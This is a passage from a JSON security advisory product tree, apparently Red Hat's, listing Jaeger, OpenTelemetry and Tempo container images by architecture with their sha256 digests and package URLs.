"rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64", "product_id": "rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-rhel8\u0026tag=1.0.0-9" } } }, { "category": "product_version", "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64", "product": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64", "product_id": "rhosdt/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2_arm64", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-opa-rhel8@sha256:fd3f7625fee23cd081884349ed632762cff480b2d76942e059dc93fbe4ddedf2?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-opa-rhel8\u0026tag=1.0.0-10" } } }, { "category": "product_version", "name": "rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64", "product": { "name": "rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64", "product_id": "rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64", "product_identification_helper": { "purl": "pkg:oci/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/tempo-operator-bundle\u0026tag=0.10.0-25" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64", "product": { "name": "rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64", "product_id": "rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8-operator\u0026tag=0.10.0-7" } } }, { "category": "product_version", "name": "rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64", "product": { "name": "rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64", "product_id": "rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64", "product_identification_helper": { "purl": "pkg:oci/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b?arch=arm64\u0026repository_url=registry.redhat.io/rhosdt/tempo-query-rhel8\u0026tag=0.10.0-10" } } } ], "category": "architecture", "name": "arm64" }, { "branches": [ { "category": "product_version", "name": "rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64", "product": { "name": "rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64", "product_id": "rhosdt/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256:03179b679ee33f51d89789a0f0bea6152b00fd7c13da9593e67b706c1e165912?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-agent-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64", "product": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64", "product_id": "rhosdt/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256:63b9c740262b01dd97edbbacf8e66a0d35187d9b4c3db0f7061569921ba0b435?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64", "product": { "name": "rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64", "product_id": "rhosdt/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256:095ec17767d98a372ddf88a27d896f0eeb26bf29da61e520000ffebac011a268?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-collector-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64", "product": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64", "product_id": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256:44da069d5aab2a8fb632a862a5ae327fe580ae97c1dadaced1fdb2980af532cf?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64", "product": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64", "product_id": "rhosdt/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256:c56cad5b9076e0ff01a0515e87f8b2b6b44c13e525c46a9dc0bf9741b2437597?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64", "product": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64", "product_id": "rhosdt/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256:62267a1d851853a04e6bdc994f9e2dd2c5c9da8fedff611182df27ef34bab37f?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-ingester-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64", "product": { "name": "rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64", "product_id": "rhosdt/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-operator-bundle@sha256:3048dd6953414dfbcaba2934785d2e5774acc9507f34ac3509a1a410b0c07f76?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-operator-bundle\u0026tag=1.57.0-26" } } }, { "category": "product_version", "name": "rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64", "product": { "name": "rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64", "product_id": "rhosdt/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256:c7312ab3bf2d911cb4acb29989f19a87c2c0ad19d5325c343685e32e3f346d0e?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-rhel8-operator\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64", "product": { "name": "rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64", "product_id": "rhosdt/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19_amd64", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256:bfe11588f58a920e4117c06a407d142a985318f2b746cb97237c73ac3d3f7e19?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/jaeger-query-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64", "product": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64", "product_id": "rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-collector-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64", "product": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64", "product_id": "rhosdt/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869_amd64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-operator-bundle@sha256:3c53d78d1aaca0166e8b13d1e98cf983ebbe70ca9fe4ca9ec187ee89ff16f869?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-operator-bundle\u0026tag=0.102.0-5" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64", "product": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64", "product_id": "rhosdt/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0_amd64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-rhel8-operator@sha256:25cb32d32c776c3ca5cf3567a9fb8809f3f12e3cb551d06fbeeeb0d668d759e0?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-rhel8-operator\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64", "product": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64", "product_id": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb_amd64", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-target-allocator-rhel8@sha256:a9a3bb1cbf169a65d2910333278cbd05e16b4268089d75c693f5c7480f0b24fb?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-target-allocator-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64", "product": { "name": "rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64", "product_id": "rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8\u0026tag=2.4.2-4" } } }, { "category": "product_version", "name": "rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64", "product": { "name": "rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64", "product_id": "rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-rhel8\u0026tag=1.0.0-9" } } }, { "category": "product_version", "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64", "product": { "name": "rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64", "product_id": "rhosdt/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0_amd64", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-opa-rhel8@sha256:3f054329885fac3d2aa00ba43e30540595a3a3521154df22f3c51995f38ee2b0?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-opa-rhel8\u0026tag=1.0.0-10" } } }, { "category": "product_version", "name": "rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64", "product": { "name": "rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64", "product_id": "rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64", "product_identification_helper": { "purl": "pkg:oci/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/tempo-operator-bundle\u0026tag=0.10.0-25" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64", "product": { "name": "rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64", "product_id": "rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8-operator\u0026tag=0.10.0-7" } } }, { "category": "product_version", "name": "rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64", "product": { "name": "rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64", "product_id": "rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64", "product_identification_helper": { "purl": "pkg:oci/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903?arch=amd64\u0026repository_url=registry.redhat.io/rhosdt/tempo-query-rhel8\u0026tag=0.10.0-10" } } } ], "category": "architecture", "name": "amd64" }, { "branches": [ { "category": "product_version", "name": "rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x", "product": { "name": "rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x", "product_id": "rhosdt/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-agent-rhel8@sha256:2b0fb0d6181a0284233669ddb0458122e1fabea6daeae12671b6d1219c8e2bf6?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-agent-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x", "product": { "name": "rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x", "product_id": "rhosdt/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-all-in-one-rhel8@sha256:7cf6cc990b52b3f6f7c663ac15ae1c090b3fd3c500e1b251f96d9d512a361195?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x", "product": { "name": "rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x", "product_id": "rhosdt/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-collector-rhel8@sha256:1b6dde7d4c3bc0227f4e8077bba21c948901304288b2b42238bce28951bf777c?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-collector-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x", "product": { "name": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x", "product_id": "rhosdt/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-index-cleaner-rhel8@sha256:cdaed1cbb883cec0b785211f4eeb3dd119cdeaf33366af1e677c28cced056753?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x", "product": { "name": "rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x", "product_id": "rhosdt/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-es-rollover-rhel8@sha256:4e23527d2c65bfd655e8060ebd05d58282ffc3b4b91bcdbb48fbcca90977bbf3?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8\u0026tag=1.57.0-7" } } }, { "category": "product_version", "name": "rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x", "product": { "name": "rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x", "product_id": "rhosdt/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-ingester-rhel8@sha256:9eecdd0f48eaf7a6aded05bf504c82a4e89b5da8ed84d1fa12c322bf676fa5a0?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-ingester-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x", "product": { "name": "rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x", "product_id": "rhosdt/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-operator-bundle@sha256:bc6a22b1774aea035aed393d404324568c392f6aba2deb62bfbad2e7aec408d7?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-operator-bundle\u0026tag=1.57.0-26" } } }, { "category": "product_version", "name": "rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x", "product": { "name": "rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x", "product_id": "rhosdt/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-rhel8-operator@sha256:c7fa52b1935d7e1cc6a6274c56b5df1d0ae2ff9fd95901a7e15847dc654dc60e?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-rhel8-operator\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x", "product": { "name": "rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x", "product_id": "rhosdt/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969_s390x", "product_identification_helper": { "purl": "pkg:oci/jaeger-query-rhel8@sha256:abe2247da478226cf7a40cc8623f91410fed282487a6dab9f1c98170d1383969?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/jaeger-query-rhel8\u0026tag=1.57.0-6" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x", "product": { "name": "rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x", "product_id": "rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-collector-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x", "product": { "name": "rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x", "product_id": "rhosdt/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3_s390x", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-operator-bundle@sha256:8a3afe2eb60314df03171f9b9c811bc118387b4e54d4eb5f168cbb7193c4e8c3?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-operator-bundle\u0026tag=0.102.0-5" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x", "product": { "name": "rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x", "product_id": "rhosdt/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328_s390x", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-rhel8-operator@sha256:82e351c3b7b32b62501a5a5ab56dc4e312b3d043b27570a06edd63fd89769328?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-rhel8-operator\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x", "product": { "name": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x", "product_id": "rhosdt/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625_s390x", "product_identification_helper": { "purl": "pkg:oci/opentelemetry-target-allocator-rhel8@sha256:878f66261440d7c062577774ebd00364ca51f3ad3fea07b6119c55e128f17625?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/opentelemetry-target-allocator-rhel8\u0026tag=0.102.0-2" } } }, { "category": "product_version", "name": "rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x", "product": { "name": "rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x", "product_id": "rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x", "product_identification_helper": { "purl": "pkg:oci/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/tempo-rhel8\u0026tag=2.4.2-4" } } }, { "category": "product_version", "name": "rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x", "product": { "name": "rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x", "product_id": "rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x", "product_identification_helper": { "purl": "pkg:oci/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a?arch=s390x\u0026repository_url=registry.redhat.io/rhosdt/tempo-gateway-rhel8\u0026tag=1.0.0-9" } } }, { "category": "product_version", "name": 